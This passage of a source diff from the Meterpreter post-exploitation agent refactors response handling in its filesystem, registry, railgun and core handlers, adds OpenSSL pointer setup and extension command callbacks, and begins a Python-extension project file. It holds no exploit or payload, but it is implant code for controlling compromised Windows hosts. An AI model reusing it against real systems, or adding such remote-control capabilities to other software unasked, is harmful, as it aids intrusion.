return gRemote->ssl.X509_VERIFY_PARAM_get_flags(param);
}
X509 *d2i_X509_bio(BIO *bp, X509 **x509)
{
return gRemote->ssl.d2i_X509_bio(bp, x509);
}
const char* X509_get_default_cert_dir()
{
return gRemote->ssl.X509_get_default_cert_dir();
}
const char* X509_get_default_cert_file()
{
return gRemote->ssl.X509_get_default_cert_file();
}
const char* X509_get_default_cert_dir_env()
{
return gRemote->ssl.X509_get_default_cert_dir_env();
}
const char* X509_get_default_cert_file_env()
{
return gRemote->ssl.X509_get_default_cert_file_env();
}

15
c/meterpreter/source/extensions/stdapi/server/fs/dir.c Normal file → Executable file
View File

@ -38,8 +38,7 @@ DWORD request_fs_ls(Remote * remote, Packet * packet)
result = fs_ls(directory, request_fs_ls_cb, response); result = fs_ls(directory, request_fs_ls_cb, response);
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); return packet_transmit_response(result, remote, response);
return PACKET_TRANSMIT(remote, response, NULL);
} }
/* /*
@ -60,8 +59,7 @@ DWORD request_fs_getwd(Remote * remote, Packet * packet)
free(directory); free(directory);
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); return packet_transmit_response(result, remote, response);
return PACKET_TRANSMIT(remote, response, NULL);
} }
/* /*
@ -83,8 +81,7 @@ DWORD request_fs_chdir(Remote * remote, Packet * packet)
result = fs_chdir(directory); result = fs_chdir(directory);
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); return packet_transmit_response(result, remote, response);
return PACKET_TRANSMIT(remote, response, NULL);
} }
/* /*
@ -105,8 +102,7 @@ DWORD request_fs_mkdir(Remote * remote, Packet * packet)
result = fs_mkdir(directory); result = fs_mkdir(directory);
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); return packet_transmit_response(result, remote, response);
return PACKET_TRANSMIT(remote, response, NULL);
} }
/* /*
@ -127,6 +123,5 @@ DWORD request_fs_delete_dir(Remote * remote, Packet * packet)
result = fs_delete_dir(directory); result = fs_delete_dir(directory);
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); return packet_transmit_response(result, remote, response);
return PACKET_TRANSMIT(remote, response, NULL);
} }

23
c/meterpreter/source/extensions/stdapi/server/fs/file.c Normal file → Executable file
View File

@ -209,9 +209,7 @@ DWORD request_fs_separator(Remote *remote, Packet *packet)
packet_add_tlv_string(response, TLV_TYPE_STRING, FS_SEPARATOR); packet_add_tlv_string(response, TLV_TYPE_STRING, FS_SEPARATOR);
packet_add_tlv_uint(response, TLV_TYPE_RESULT, ERROR_SUCCESS); return packet_transmit_response(ERROR_SUCCESS, remote, response);
return PACKET_TRANSMIT(remote, response, NULL);
} }
@ -250,8 +248,7 @@ DWORD request_fs_stat(Remote *remote, Packet *packet)
free(expanded); free(expanded);
out: out:
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); return packet_transmit_response(result, remote, response);
return PACKET_TRANSMIT(remote, response, NULL);
} }
/* /*
@ -273,8 +270,7 @@ DWORD request_fs_delete_file(Remote *remote, Packet *packet)
result = fs_delete_file(path); result = fs_delete_file(path);
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); return packet_transmit_response(result, remote, response);
return PACKET_TRANSMIT(remote, response, NULL);
} }
/* /*
@ -305,8 +301,7 @@ DWORD request_fs_file_expand_path(Remote *remote, Packet *packet)
packet_add_tlv_string(response, TLV_TYPE_FILE_PATH, expanded); packet_add_tlv_string(response, TLV_TYPE_FILE_PATH, expanded);
free(expanded); free(expanded);
out: out:
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); return packet_transmit_response(result, remote, response);
return PACKET_TRANSMIT(remote, response, NULL);
} }
@ -345,8 +340,7 @@ DWORD request_fs_md5(Remote *remote, Packet *packet)
fclose(fd); fclose(fd);
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); return packet_transmit_response(result, remote, response);
return PACKET_TRANSMIT(remote, response, NULL);
} }
@ -383,8 +377,7 @@ DWORD request_fs_sha1(Remote *remote, Packet *packet)
packet_add_tlv_raw(response, TLV_TYPE_FILE_HASH, hash, sizeof(hash)); packet_add_tlv_raw(response, TLV_TYPE_FILE_HASH, hash, sizeof(hash));
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); return packet_transmit_response(result, remote, response);
return PACKET_TRANSMIT(remote, response, NULL);
} }
/* /*
@ -408,7 +401,5 @@ DWORD request_fs_file_move(Remote *remote, Packet *packet)
result = fs_move(oldpath, newpath); result = fs_move(oldpath, newpath);
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); return packet_transmit_response(result, remote, response);
return PACKET_TRANSMIT(remote, response, NULL);
} }

3
c/meterpreter/source/extensions/stdapi/server/fs/search.c Normal file → Executable file
View File

@ -863,8 +863,7 @@ DWORD request_fs_search(Remote * pRemote, Packet * pPacket)
if (pResponse) if (pResponse)
{ {
packet_add_tlv_uint(pResponse, TLV_TYPE_RESULT, dwResult); dwResult = packet_transmit_response(dwResult, pRemote, pResponse);
dwResult = PACKET_TRANSMIT(pRemote, pResponse, NULL);
} }
wds_shutdown(&WDSInterface); wds_shutdown(&WDSInterface);

12
c/meterpreter/source/extensions/stdapi/server/railgun/railgun.c Normal file → Executable file
View File

@ -561,8 +561,6 @@ DWORD request_railgun_api( Remote * pRemote, Packet * pPacket )
if( pResponse ) if( pResponse )
{ {
packet_add_tlv_uint( pResponse, TLV_TYPE_RESULT, dwResult );
if( dwResult == ERROR_SUCCESS ) if( dwResult == ERROR_SUCCESS )
{ {
packet_add_tlv_uint( pResponse, TLV_TYPE_RAILGUN_BACK_ERR, rOutput.dwLastError ); packet_add_tlv_uint( pResponse, TLV_TYPE_RAILGUN_BACK_ERR, rOutput.dwLastError );
@ -585,7 +583,7 @@ DWORD request_railgun_api( Remote * pRemote, Packet * pPacket )
packet_add_tlv_string( pResponse, TLV_TYPE_RAILGUN_BACK_MSG, pErrorMsg ); packet_add_tlv_string( pResponse, TLV_TYPE_RAILGUN_BACK_MSG, pErrorMsg );
} }
dwResult = PACKET_TRANSMIT( pRemote, pResponse, NULL ); dwResult = packet_transmit_response(dwResult, pRemote, pResponse);
} }
if( rInput.pBufferIN ) if( rInput.pBufferIN )
@ -651,12 +649,10 @@ DWORD request_railgun_memread( Remote * pRemote, Packet * pPacket )
if( pResponse ) if( pResponse )
{ {
packet_add_tlv_uint( pResponse, TLV_TYPE_RESULT, dwResult );
if( pData ) if( pData )
packet_add_tlv_raw( pResponse, TLV_TYPE_RAILGUN_MEM_DATA, pData, dwLength ); packet_add_tlv_raw( pResponse, TLV_TYPE_RAILGUN_MEM_DATA, pData, dwLength );
dwResult = PACKET_TRANSMIT( pRemote, pResponse, NULL ); dwResult = packet_transmit_response(dwResult, pRemote, pResponse);
} }
if( pData ) if( pData )
@ -711,9 +707,7 @@ DWORD request_railgun_memwrite( Remote * pRemote, Packet * pPacket )
if( pResponse ) if( pResponse )
{ {
packet_add_tlv_uint( pResponse, TLV_TYPE_RESULT, dwResult ); dwResult = packet_transmit_response(dwResult, pRemote, pResponse);
dwResult = PACKET_TRANSMIT( pRemote, pResponse, NULL );
} }
dprintf("[RAILGUN] request_railgun_memwrite: Finished."); dprintf("[RAILGUN] request_railgun_memwrite: Finished.");

6
c/meterpreter/source/extensions/stdapi/server/sys/config/config.c
View File

@ -706,8 +706,10 @@ DWORD request_sys_config_sysinfo(Remote *remote, Packet *packet)
packet_add_tlv_uint(response, TLV_TYPE_LOGGED_ON_USER_COUNT, localSysinfo->wki102_logged_on_users); packet_add_tlv_uint(response, TLV_TYPE_LOGGED_ON_USER_COUNT, localSysinfo->wki102_logged_on_users);
free(domainName); free(domainName);
} }
else
{
dprintf("[CONFIG] Failed to get local system info for logged on user count / domain");
}
} while (0); } while (0);
#else #else
CHAR os[512]; CHAR os[512];

54
c/meterpreter/source/extensions/stdapi/server/sys/registry/registry.c Normal file → Executable file
View File

@ -76,8 +76,7 @@ DWORD request_registry_load_key(Remote *remote, Packet *packet)
{ {
result = RegLoadKey(rootKey,baseKey,hiveFile); result = RegLoadKey(rootKey,baseKey,hiveFile);
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); packet_transmit_response(result, remote, response);
PACKET_TRANSMIT(remote, response, NULL);
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
@ -97,8 +96,7 @@ DWORD request_registry_unload_key(Remote *remote, Packet *packet)
{ {
result = RegUnLoadKey(rootKey,baseKey); result = RegUnLoadKey(rootKey,baseKey);
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); packet_transmit_response(result, remote, response);
PACKET_TRANSMIT(remote, response, NULL);
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
@ -148,9 +146,7 @@ DWORD request_registry_open_key(Remote *remote, Packet *packet)
packet_add_tlv_qword(response, TLV_TYPE_HKEY, (QWORD)resKey); packet_add_tlv_qword(response, TLV_TYPE_HKEY, (QWORD)resKey);
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); packet_transmit_response(result, remote, response);
PACKET_TRANSMIT(remote, response, NULL);
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
@ -188,9 +184,7 @@ DWORD request_registry_open_remote_key(Remote *remote, Packet *packet)
packet_add_tlv_qword(response, TLV_TYPE_HKEY, (QWORD)resKey); packet_add_tlv_qword(response, TLV_TYPE_HKEY, (QWORD)resKey);
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); packet_transmit_response(result, remote, response);
PACKET_TRANSMIT(remote, response, NULL);
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
@ -235,9 +229,7 @@ DWORD request_registry_create_key(Remote *remote, Packet *packet)
packet_add_tlv_qword(response, TLV_TYPE_HKEY, (QWORD)resKey); packet_add_tlv_qword(response, TLV_TYPE_HKEY, (QWORD)resKey);
} }
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); packet_transmit_response(result, remote, response);
PACKET_TRANSMIT(remote, response, NULL);
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
@ -303,9 +295,7 @@ static void enum_key(Remote *remote, Packet *packet, HKEY hkey)
} }
// Set the result and transmit the response // Set the result and transmit the response
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); packet_transmit_response(result, remote, response);
PACKET_TRANSMIT(remote, response, NULL);
} }
/* /*
@ -380,9 +370,7 @@ DWORD request_registry_delete_key(Remote *remote, Packet *packet)
} }
// Set the result and send the response // Set the result and send the response
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); packet_transmit_response(result, remote, response);
PACKET_TRANSMIT(remote, response, NULL);
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
@ -407,9 +395,7 @@ DWORD request_registry_close_key(Remote *remote, Packet *packet)
result = RegCloseKey(hkey); result = RegCloseKey(hkey);
// Set the result and send the response // Set the result and send the response
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); packet_transmit_response(result, remote, response);
PACKET_TRANSMIT(remote, response, NULL);
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
@ -443,10 +429,7 @@ static void set_value(Remote *remote, Packet *packet, HKEY hkey)
} while (0); } while (0);
// Populate the result code // Populate the result code
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); packet_transmit_response(result, remote, response);
// Transmit the response
PACKET_TRANSMIT(remote, response, NULL);
} }
/* /*
@ -538,10 +521,7 @@ static void query_value(Remote *remote, Packet *packet, HKEY hkey)
} while (0); } while (0);
// Populate the result code // Populate the result code
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); packet_transmit_response(result, remote, response);
// Transmit the response
PACKET_TRANSMIT(remote, response, NULL);
} }
/* /*
@ -647,9 +627,7 @@ static void enum_value(Remote *remote, Packet *packet, HKEY hkey)
} }
// Set the result and transmit the response // Set the result and transmit the response
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); packet_transmit_response(result, remote, response);
PACKET_TRANSMIT(remote, response, NULL);
} }
@ -715,9 +693,7 @@ DWORD request_registry_delete_value(Remote *remote, Packet *packet)
result = RegDeleteValue(hkey, valueName); result = RegDeleteValue(hkey, valueName);
// Set the result and send the response // Set the result and send the response
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result); packet_transmit_response(result, remote, response);
PACKET_TRANSMIT(remote, response, NULL);
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
@ -752,11 +728,7 @@ DWORD request_registry_query_class(Remote *remote, Packet *packet)
} while (0); } while (0);
// Populate the result code packet_transmit_response(result, remote, response);
packet_add_tlv_uint(response, TLV_TYPE_RESULT, result);
// Transmit the response
PACKET_TRANSMIT(remote, response, NULL);
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }

2
c/meterpreter/source/server/metsrv.h Normal file → Executable file
View File

@ -34,6 +34,7 @@ DWORD server_setup(MetsrvConfig* config);
typedef DWORD (*PSRVINIT)(Remote *remote); typedef DWORD (*PSRVINIT)(Remote *remote);
typedef DWORD (*PSRVDEINIT)(Remote *remote); typedef DWORD (*PSRVDEINIT)(Remote *remote);
typedef DWORD (*PSRVGETNAME)(char* buffer, int bufferSize); typedef DWORD (*PSRVGETNAME)(char* buffer, int bufferSize);
typedef VOID (*PCMDADDED)(const char* commandName);
typedef struct _EXTENSION typedef struct _EXTENSION
{ {
@ -41,6 +42,7 @@ typedef struct _EXTENSION
PSRVINIT init; PSRVINIT init;
PSRVDEINIT deinit; PSRVDEINIT deinit;
PSRVGETNAME getname; PSRVGETNAME getname;
PCMDADDED commandAdded;
Command* start; Command* start;
Command* end; Command* end;
char name[16]; char name[16];

4
c/meterpreter/source/server/remote_dispatch_common.c Normal file → Executable file
View File

@ -93,9 +93,7 @@ DWORD request_core_enumextcmd(Remote* remote, Packet* packet)
// Start by enumerating the names of the extensions // Start by enumerating the names of the extensions
bResult = list_enumerate(gExtensionList, ext_cmd_callback, &enumExt); bResult = list_enumerate(gExtensionList, ext_cmd_callback, &enumExt);
packet_add_tlv_uint(pResponse, TLV_TYPE_RESULT, ERROR_SUCCESS); packet_transmit_response(ERROR_SUCCESS, remote, pResponse);
PACKET_TRANSMIT(remote, pResponse, NULL);
} }
return ERROR_SUCCESS; return ERROR_SUCCESS;

3
c/meterpreter/source/server/server_setup_win.c
View File

@ -7,6 +7,7 @@
#include "win/server_transport_winhttp.h" #include "win/server_transport_winhttp.h"
#include "win/server_transport_tcp.h" #include "win/server_transport_tcp.h"
#include "ssl_lib_setup.h"
#define TRANSPORT_ID_OFFSET 22 #define TRANSPORT_ID_OFFSET 22
@ -321,6 +322,8 @@ DWORD server_setup(MetsrvConfig* config)
break; break;
} }
setup_ssl_lib(&remote->ssl);
remote->orig_config = config; remote->orig_config = config;
remote->sess_expiry_time = config->session.expiry; remote->sess_expiry_time = config->session.expiry;
remote->sess_start_time = current_unix_timestamp(); remote->sess_start_time = current_unix_timestamp();

142
c/meterpreter/source/server/ssl_lib_setup.c Executable file
View File

@ -0,0 +1,142 @@
#include "metsrv.h"
#include "../../common/common.h"
#include "ssl_lib_setup.h"
// OpenSSL lib includes which contain references to the functions
#include "openssl/ssl.h"
#include "openssl/rand.h"
#include "openssl/err.h"
#include "openssl/x509.h"
#include "openssl/x509v3.h"
void setup_ssl_lib(SslLib* sslLib)
{
dprintf("[SSL] setting up all SSL function pointers");
sslLib->RAND_status = RAND_status;
sslLib->RAND_add = RAND_add;
sslLib->RAND_egd = RAND_egd;
sslLib->ERR_get_state = ERR_get_state;
sslLib->ERR_reason_error_string = ERR_reason_error_string;
sslLib->ERR_clear_error = ERR_clear_error;
sslLib->ERR_peek_last_error = ERR_peek_last_error;
sslLib->SSL_get_current_compression = SSL_get_current_compression;
sslLib->SSL_get_ex_data = SSL_get_ex_data;
sslLib->SSL_set_SSL_CTX = SSL_set_SSL_CTX;
sslLib->SSL_get_SSL_CTX = SSL_get_SSL_CTX;
sslLib->SSL_CTX_load_verify_locations = SSL_CTX_load_verify_locations;
sslLib->SSL_CTX_set_default_verify_paths = SSL_CTX_set_default_verify_paths;
sslLib->SSL_get_shutdown = SSL_get_shutdown;
sslLib->SSL_library_init = SSL_library_init;
sslLib->SSL_set_accept_state = SSL_set_accept_state;
sslLib->SSL_set_connect_state = SSL_set_connect_state;
sslLib->SSL_shutdown = SSL_shutdown;
sslLib->SSL_do_handshake = SSL_do_handshake;
sslLib->TLSv1_method = TLSv1_method;
sslLib->SSLv23_method = SSLv23_method;
sslLib->SSLv3_method = SSLv3_method;
sslLib->SSLv2_method = SSLv2_method;
sslLib->SSL_get_version = SSL_get_version;
sslLib->SSL_get_error = SSL_get_error;
sslLib->SSL_CTX_callback_ctrl = SSL_CTX_callback_ctrl;
sslLib->SSL_CTX_ctrl = SSL_CTX_ctrl;
sslLib->SSL_free = SSL_free;
sslLib->SSL_read = SSL_read;
sslLib->SSL_write = SSL_write;
sslLib->SSL_new = SSL_new;
sslLib->SSL_CTX_set_session_id_context = SSL_CTX_set_session_id_context;
sslLib->SSL_CTX_check_private_key = SSL_CTX_check_private_key;
sslLib->SSL_CTX_set_default_passwd_cb = SSL_CTX_set_default_passwd_cb;
sslLib->SSL_CTX_set_default_passwd_cb_userdata = SSL_CTX_set_default_passwd_cb_userdata;
sslLib->SSL_set_ex_data = SSL_set_ex_data;
sslLib->SSL_ctrl = SSL_ctrl;
sslLib->SSL_CTX_set_verify = SSL_CTX_set_verify;
sslLib->SSL_CTX_get_verify_mode = SSL_CTX_get_verify_mode;
sslLib->SSL_get_peer_certificate = SSL_get_peer_certificate;
sslLib->SSL_load_error_strings = SSL_load_error_strings;
sslLib->SSL_CTX_use_certificate_chain_file = SSL_CTX_use_certificate_chain_file;
sslLib->SSL_CTX_use_PrivateKey_file = SSL_CTX_use_PrivateKey_file;
sslLib->SSL_set_read_ahead = SSL_set_read_ahead;
sslLib->SSL_get_wbio = SSL_get_wbio;
sslLib->SSL_get_rbio = SSL_get_rbio;
sslLib->SSL_set_fd = SSL_set_fd;
sslLib->SSL_pending = SSL_pending;
sslLib->SSL_CIPHER_get_version = SSL_CIPHER_get_version;
sslLib->SSL_CIPHER_get_name = SSL_CIPHER_get_name;
sslLib->SSL_CIPHER_get_bits = SSL_CIPHER_get_bits;
sslLib->SSL_get_current_cipher = SSL_get_current_cipher;
sslLib->SSL_CTX_get_cert_store = SSL_CTX_get_cert_store;
sslLib->SSL_CTX_free = SSL_CTX_free;
sslLib->SSL_CTX_new = SSL_CTX_new;
sslLib->SSL_CTX_set_cipher_list = SSL_CTX_set_cipher_list;
sslLib->SSL_get_finished = SSL_get_finished;
sslLib->SSL_get_peer_finished = SSL_get_peer_finished;
sslLib->SSL_get_servername = SSL_get_servername;
sslLib->PEM_read_bio = PEM_read_bio;
sslLib->PEM_read_bio_X509 = PEM_read_bio_X509;
sslLib->PEM_read_bio_X509_AUX = PEM_read_bio_X509_AUX;
sslLib->X509_check_ca = X509_check_ca;
sslLib->PEM_read_bio_DHparams = PEM_read_bio_DHparams;
sslLib->X509V3_EXT_get = X509V3_EXT_get;
sslLib->AUTHORITY_INFO_ACCESS_free = AUTHORITY_INFO_ACCESS_free;
sslLib->GENERAL_NAME_print = GENERAL_NAME_print;
sslLib->GENERAL_NAME_free = GENERAL_NAME_free;
sslLib->X509_add_ext = X509_add_ext;
sslLib->X509_get_ext_d2i = X509_get_ext_d2i;
sslLib->X509_get_ext_by_NID = X509_get_ext_by_NID;
sslLib->X509_NAME_ENTRY_get_object = X509_NAME_ENTRY_get_object;
sslLib->X509_NAME_ENTRY_get_data = X509_NAME_ENTRY_get_data;
sslLib->X509_NAME_get_entry = X509_NAME_get_entry;
sslLib->X509_NAME_entry_count = X509_NAME_entry_count;
sslLib->X509_get_subject_name = X509_get_subject_name;
sslLib->X509_get_serialNumber = X509_get_serialNumber;
sslLib->X509_get_ext = X509_get_ext;
sslLib->X509_get_issuer_name = X509_get_issuer_name;
sslLib->i2d_X509 = i2d_X509;
sslLib->X509_free = X509_free;
sslLib->sk_value = sk_value;
sslLib->sk_num = sk_num;
sslLib->sk_pop_free = sk_pop_free;
sslLib->SSLeay_version = SSLeay_version;
sslLib->SSLeay = SSLeay;
sslLib->CRYPTO_num_locks = CRYPTO_num_locks;
sslLib->CRYPTO_set_locking_callback = CRYPTO_set_locking_callback;
sslLib->CRYPTO_set_id_callback = CRYPTO_set_id_callback;
sslLib->CRYPTO_free = CRYPTO_free;
sslLib->BIO_s_file = BIO_s_file;
sslLib->BIO_new_file = BIO_new_file;
sslLib->BIO_new = BIO_new;
sslLib->BIO_free = BIO_free;
sslLib->BIO_gets = BIO_gets;
sslLib->BIO_ctrl = BIO_ctrl;
sslLib->BIO_s_mem = BIO_s_mem;
sslLib->BIO_new_mem_buf = BIO_new_mem_buf;
sslLib->ASN1_OBJECT_free = ASN1_OBJECT_free;
sslLib->ASN1_STRING_length = ASN1_STRING_length;
sslLib->ASN1_STRING_data = ASN1_STRING_data;
sslLib->i2a_ASN1_INTEGER = i2a_ASN1_INTEGER;
sslLib->ASN1_INTEGER_get = ASN1_INTEGER_get;
sslLib->ASN1_STRING_to_UTF8 = ASN1_STRING_to_UTF8;
sslLib->ASN1_TIME_print = ASN1_TIME_print;
sslLib->ASN1_item_d2i = ASN1_item_d2i;
sslLib->OBJ_nid2obj = OBJ_nid2obj;
sslLib->OBJ_nid2ln = OBJ_nid2ln;
sslLib->OBJ_nid2sn = OBJ_nid2sn;
sslLib->OBJ_obj2nid = OBJ_obj2nid;
sslLib->OBJ_txt2obj = OBJ_txt2obj;
sslLib->OBJ_obj2txt = OBJ_obj2txt;
sslLib->OBJ_sn2nid = OBJ_sn2nid;
sslLib->OPENSSL_add_all_algorithms_noconf = OPENSSL_add_all_algorithms_noconf;
sslLib->EC_KEY_new_by_curve_name = EC_KEY_new_by_curve_name;
sslLib->EC_KEY_free = EC_KEY_free;
sslLib->DH_free = DH_free;
sslLib->X509_STORE_add_cert = X509_STORE_add_cert;
sslLib->X509_VERIFY_PARAM_set_flags = X509_VERIFY_PARAM_set_flags;
sslLib->X509_VERIFY_PARAM_clear_flags = X509_VERIFY_PARAM_clear_flags;
sslLib->X509_VERIFY_PARAM_get_flags = X509_VERIFY_PARAM_get_flags;
sslLib->d2i_X509_bio = d2i_X509_bio;
sslLib->X509_get_default_cert_dir = X509_get_default_cert_dir;
sslLib->X509_get_default_cert_file = X509_get_default_cert_file;
sslLib->X509_get_default_cert_dir_env = X509_get_default_cert_dir_env;
sslLib->X509_get_default_cert_file_env = X509_get_default_cert_file_env;
dprintf("[SSL] function pointers configured");
}

10
c/meterpreter/source/server/ssl_lib_setup.h Executable file
View File

@ -0,0 +1,10 @@
/*!
* @file ssl_lib_setup.h
* @brief Set up of SSL library pointers.
*/
#ifndef _METERPRETER_METSRV_SSL_LIB_SETUP_H
#define _METERPRETER_METSRV_SSL_LIB_SETUP_H
void setup_ssl_lib(SslLib* sslLib);
#endif

26
c/meterpreter/source/server/win/remote_dispatch.c Normal file → Executable file
View File

@ -26,12 +26,14 @@ DWORD initialise_extension(HMODULE hLibrary, BOOL bLibLoadedReflectivly, Remote*
pExtension->init = (PSRVINIT)GetProcAddressR(pExtension->library, "InitServerExtension"); pExtension->init = (PSRVINIT)GetProcAddressR(pExtension->library, "InitServerExtension");
pExtension->deinit = (PSRVDEINIT)GetProcAddressR(pExtension->library, "DeinitServerExtension"); pExtension->deinit = (PSRVDEINIT)GetProcAddressR(pExtension->library, "DeinitServerExtension");
pExtension->getname = (PSRVGETNAME)GetProcAddressR(pExtension->library, "GetExtensionName"); pExtension->getname = (PSRVGETNAME)GetProcAddressR(pExtension->library, "GetExtensionName");
pExtension->commandAdded = (PCMDADDED)GetProcAddressR(pExtension->library, "CommandAdded");
} }
else else
{ {
pExtension->init = (PSRVINIT)GetProcAddress(pExtension->library, "InitServerExtension"); pExtension->init = (PSRVINIT)GetProcAddress(pExtension->library, "InitServerExtension");
pExtension->deinit = (PSRVDEINIT)GetProcAddress(pExtension->library, "DeinitServerExtension"); pExtension->deinit = (PSRVDEINIT)GetProcAddress(pExtension->library, "DeinitServerExtension");
pExtension->getname = (PSRVGETNAME)GetProcAddress(pExtension->library, "GetExtensionName"); pExtension->getname = (PSRVGETNAME)GetProcAddress(pExtension->library, "GetExtensionName");
pExtension->commandAdded = (PCMDADDED)GetProcAddress(pExtension->library, "CommandAdded");
} }
// patch in the metsrv.dll's HMODULE handle, used by the server extensions for delay loading // patch in the metsrv.dll's HMODULE handle, used by the server extensions for delay loading
@ -55,6 +57,15 @@ DWORD initialise_extension(HMODULE hLibrary, BOOL bLibLoadedReflectivly, Remote*
if (dwResult == ERROR_SUCCESS) if (dwResult == ERROR_SUCCESS)
{ {
// inform the new extension of the existing commands
if (pExtension->commandAdded)
{
for (Command* command = pExtension->end; command != NULL; command = command->next)
{
pExtension->commandAdded(command->method);
}
}
if (pExtension->getname) if (pExtension->getname)
{ {
pExtension->getname(pExtension->name, sizeof(pExtension->name)); pExtension->getname(pExtension->name, sizeof(pExtension->name));
@ -74,6 +85,17 @@ DWORD initialise_extension(HMODULE hLibrary, BOOL bLibLoadedReflectivly, Remote*
for (Command* command = pExtension->start; command != pExtension->end; command = command->next) for (Command* command = pExtension->start; command != pExtension->end; command = command->next)
{ {
packet_add_tlv_string(pResponse, TLV_TYPE_METHOD, command->method); packet_add_tlv_string(pResponse, TLV_TYPE_METHOD, command->method);
// inform existing extensions of the new commands
for (PNODE node = gExtensionList->start; node != NULL; node = node->next)
{
PEXTENSION ext = (PEXTENSION)node->data;
// don't inform the extension of itself
if (ext != pExtension && ext->commandAdded)
{
ext->commandAdded(command->method);
}
}
} }
} }
} }
@ -192,8 +214,7 @@ DWORD request_core_loadlib(Remote *pRemote, Packet *pPacket)
if (response) if (response)
{ {
packet_add_tlv_uint(response, TLV_TYPE_RESULT, res); packet_transmit_response(res, pRemote, response);
PACKET_TRANSMIT(pRemote, response, NULL);
} }
return res; return res;
@ -236,6 +257,7 @@ DWORD request_core_machine_id(Remote* pRemote, Packet* pPacket)
_snwprintf_s(buffer, MAX_PATH, MAX_PATH - 1, L"%04x-%04x:%s", HIWORD(serialNumber), LOWORD(serialNumber), computerName); _snwprintf_s(buffer, MAX_PATH, MAX_PATH - 1, L"%04x-%04x:%s", HIWORD(serialNumber), LOWORD(serialNumber), computerName);
packet_add_tlv_wstring(pResponse, TLV_TYPE_MACHINE_ID, buffer); packet_add_tlv_wstring(pResponse, TLV_TYPE_MACHINE_ID, buffer);
dprintf("[CORE] sending machine id: %S", buffer);
} }
packet_transmit_response(res, pRemote, pResponse); packet_transmit_response(res, pRemote, pResponse);

838
c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj Executable file
View File

@ -0,0 +1,838 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="r7_debug|Win32">
<Configuration>r7_debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="r7_debug|x64">
<Configuration>r7_debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="r7_release|Win32">
<Configuration>r7_release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="r7_release|x64">
<Configuration>r7_release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}</ProjectGuid>
<RootNamespace>ext_server_python</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
